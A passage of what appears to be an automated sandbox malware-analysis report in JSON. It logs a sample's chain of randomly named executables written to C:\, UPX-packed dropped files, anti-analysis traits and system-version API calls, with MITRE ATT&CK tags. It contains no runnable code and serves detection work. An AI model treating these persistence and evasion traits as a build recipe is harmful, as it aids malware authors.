\"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hvnjft.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lxpbndn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8284862.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2664824.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rbndhnn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ltnxl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rllbfv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jvvbdv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nnpjtv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rbpjdh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vnxlf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" writes file \"c:\\vnxhhp.exe\"\n \"vnxhhp.exe\" writes file \"c:\\hvnjft.exe\"\n \"hvnjft.exe\" writes file \"c:\\lxpbndn.exe\"\n \"lxpbndn.exe\" writes file \"c:\\8284862.exe\"\n \"8284862.exe\" writes file \"c:\\2664824.exe\"\n \"2664824.exe\" writes file \"c:\\rbndhnn.exe\"\n \"rbndhnn.exe\" writes file \"c:\\ltnxl.exe\"\n \"ltnxl.exe\" writes file \"c:\\rllbfv.exe\"\n \"rllbfv.exe\" writes file \"c:\\jvvbdv.exe\"\n \"jvvbdv.exe\" writes file \"c:\\nnpjtv.exe\"\n \"nnpjtv.exe\" writes file \"c:\\rbpjdh.exe\"\n \"rbpjdh.exe\" writes file \"c:\\vnxlf.exe\"\n \"vnxlf.exe\" writes file \"c:\\68804.exe\"\n \"68804.exe\" writes file \"c:\\264608.exe\"\n \"264608.exe\" writes file \"c:\\hbxvf.exe\"\n \"hbxvf.exe\" writes file \"c:\\djhdv.exe\"\n \"djhdv.exe\" writes file \"c:\\vvlhl.exe\"\n \"vvlhl.exe\" writes file \"c:\\ndnvnh.exe\"\n \"ndnvnh.exe\" writes file \"c:\\nhxhrtb.exe\"\n \"nhxhrtb.exe\" writes file \"c:\\hhprhp.exe\"\n \"hhprhp.exe\" writes file \"c:\\fjprrfr.exe\"\n \"fjprrfr.exe\" writes file \"c:\\nxxhj.exe\"\n \"nxxhj.exe\" writes file \"c:\\6644682.exe\"\n \"6644682.exe\" writes file \"c:\\4442828.exe\"\n \"4442828.exe\" writes file \"c:\\080068.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"rhnvfjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hlrxpfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4080482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2286284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2020002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8808880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dptrvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dptrvt.exe]- [targetUID: 00000000-00002116]\n \"nxthl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxthl.exe]- [targetUID: 00000000-00002116]\n \"606282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\606282.exe]- [targetUID: 00000000-00003752]\n \"402060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\402060.exe]- [targetUID: 00000000-00004680]\n \"422022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\422022.exe]- [targetUID: 00000000-00004680]\n \"0066646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0066646.exe]- [targetUID: 00000000-00004652]\n \"066460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\066460.exe]- [targetUID: 00000000-00001692]\n \"6400262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6400262.exe]- [targetUID: 00000000-00001712]\n \"njxth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njxth.exe]- [targetUID: 00000000-00001192]\n \"rhnnvfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnnvfl.exe]- [targetUID: 00000000-00001192]\n \"ddxvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ddxvh.exe]- [targetUID: 00000000-00002252]\n \"trrfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trrfx.exe]- [targetUID: 00000000-00002252]\n \"ldprbfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldprbfj.exe]- [targetUID: 00000000-00004256]\n \"rndlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rndlb.exe]- [targetUID: 00000000-00003096]\n \"nxdndh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxdndh.exe]- [targetUID: 00000000-00003096]\n \"242220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242220.exe]- [targetUID: 00000000-00003656]\n \"66846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66846.exe]- [targetUID: 00000000-00003656]\n \"22228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22228.exe]- [targetUID: 00000000-00002956]\n \"680060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\680060.exe]- [targetUID: 00000000-00002956]\n \"404042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\404042.exe]- [targetUID: 00000000-00000108]\n \"frftj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frftj.exe]- [targetUID: 00000000-00001852]\n \"jfpjt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfpjt.exe]- [targetUID: 00000000-00001852]\n \"pfxjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfxjb.exe]- [targetUID: 00000000-00002952]\n \"06460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06460.exe]- [targetUID: 00000000-00002952]\n \"6602848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6602848.exe]- [targetUID: 00000000-00002736]\n \"6662204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6662204.exe]- [targetUID: 00000000-00002380]\n \"244640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\244640.exe]- [targetUID: 00000000-00002380]\n \"4600202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4600202.exe]- [targetUID: 00000000-00004308]\n \"684202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\684202.exe]- [targetUID: 00000000-00004308]\n \"480606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\480606.exe]- [targetUID: 00000000-00002028]\n \"jxtvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtvd.exe]- [targetUID: 00000000-00002028]\n \"bnjttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnjttb.exe]- [targetUID: 00000000-00000788]\n \"phlthhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phlthhl.exe]- [targetUID: 00000000-00004432]\n \"djblbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djblbb.exe]- [targetUID: 00000000-00003604]\n \"llrlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llrlf.exe]- [targetUID: 00000000-00003604]\n \"vtrrrtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtrrrtd.exe]- [targetUID: 00000000-00001080]\n \"vfvxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfvxb.exe]- [targetUID: 00000000-00001428]\n \"jjtpnvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjtpnvv.exe]- [targetUID: 00000000-00001428]\n \"04028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04028.exe]- [targetUID: 00000000-00004316]\n \"080068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\080068.exe]- [targetUID: 00000000-00003716]\n \"4442828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4442828.exe]- [targetUID: 00000000-00003716]\n \"6644682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6644682.exe]- [targetUID: 00000000-00003776]\n \"nxxhj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxxhj.exe]- [targetUID: 00000000-00001820]\n \"fjprrfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjprrfr.exe]- [targetUID: 00000000-00001820]\n \"hhprhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhprhp.exe]- [targetUID: 00000000-00004416]\n \"nhxhrtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhxhrtb.exe]- [targetUID: 00000000-00003364]\n \"ndnvnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndnvnh.exe]- [targetUID: 00000000-00004548]\n \"vvlhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvlhl.exe]- [targetUID: 00000000-00004548]\n \"djhdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djhdv.exe]- [targetUID: 00000000-00002108]\n \"hbxvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbxvf.exe]- [targetUID: 00000000-00004228]\n \"264608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\264608.exe]- [targetUID: 00000000-00003728]\n \"68804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68804.exe]- [targetUID: 00000000-00003728]\n \"vnxlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnxlf.exe]- [targetUID: 00000000-00003712]\n \"rbpjdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbpjdh.exe]- [targetUID: 00000000-00003712]\n \"nnpjtv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnpjtv.exe]- [targetUID: 00000000-00006096]\n \"jvvbdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvvbdv.exe]- [targetUID: 00000000-00006096]\n \"rllbfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rllbfv.exe]- [targetUID: 00000000-00006140]\n \"ltnxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltnxl.exe]- [targetUID: 00000000-00006140]\n \"rbndhnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbndhnn.exe]- [targetUID: 00000000-00006132]\n \"2664824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2664824.exe]- [targetUID: 00000000-00004516]\n \"8284862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8284862.exe]- [targetUID: 00000000-00006080]\n \"lxpbndn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxpbndn.exe]- [targetUID: 00000000-00005952]\n \"hvnjft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvnjft.exe]- [targetUID: 00000000-00005936]\n \"vnxhhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnxhhp.exe]- [targetUID: 00000000-00005936]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002800f8032800f3032800000000000000000000002000000000011ce312000000000080f0120095e1c6772e391700feffffff435cca775059ca77aa000000b8000000f2032800f0032800a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca771a042800a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca0751a042800a06aa075a06aa07514e9120002020000 (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005944)\n \"vnxhhp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700a8346700a3346700000000000000000000005f00000000011ce312000000000080f0120095e1c677e63f1700feffffff435cca775059ca77aa000000b8000000a2346700a0346700a4e41200dce81200000000000000000000000000000000000000000000000000e019000000005f001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca77ca346700a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca075ca346700a06aa075a06aa07514e9120002020000 (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005936)\n \"hvnjft.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"hvnjft.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370040b437003bb43700000000000000000000003000000000011ce312000000000080f0120095e1c677b73d1700feffffff435cca775059ca77aa000000b80000003ab4370038b43700a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000030001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca7762b43700a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca07562b43700a06aa075a06aa07514e9120002020000 (UID: 00000000-00005952)\n \"hvnjft.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"lxpbndn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000021000837210003372100000000000000000000001900000000011ce312000000000080f0120095e1c6775c211700feffffff435cca775059ca77aa000000b80000000237210000372100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca772a372100a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca0752a372100a06aa075a06aa07514e9120002020000 (UID: 00000000-00004248)\n \"lxpbndn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004248)\n \"8284862.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)\n \"8284862.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000690060b469005bb46900000000000000000000006200000000011ce312000000000080f0120095e1c67765201700feffffff435cca775059ca77aa000000b80000005ab4690058b46900a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000062001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca7782b46900a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca07582b46900a06aa075a06aa07514e9120002020000 (UID: 00000000-00006080)\n \"8284862.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)\n \"2664824.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004516)\n \"2664824.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000024005834240053342400000000000000000000001c00000000011ce312000000000080f0120095e1c677d5251700feffffff435cca775059ca77aa000000b80000005234240050342400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001c001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca777a342400a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca0757a342400a06aa075a06aa07514e9120002020000 (UID: 00000000-00004516)\n \"2664824.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004516)\n \"rbndhnn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006132)\n \"rbndhnn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000b8362000b3362000000000000000000000001800000000011ce312000000000080f0120095e1c677fa291700feffffff435cca775059ca77aa000000b8000000b2362000b0362000a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000018001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca77da362000a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca075da362000a06aa075a06aa07514e9120002020000 (UID: 00000000-00006132)\n \"rbndhnn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006132)\n \"ltnxl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"RtlGetVersion\" with parameter 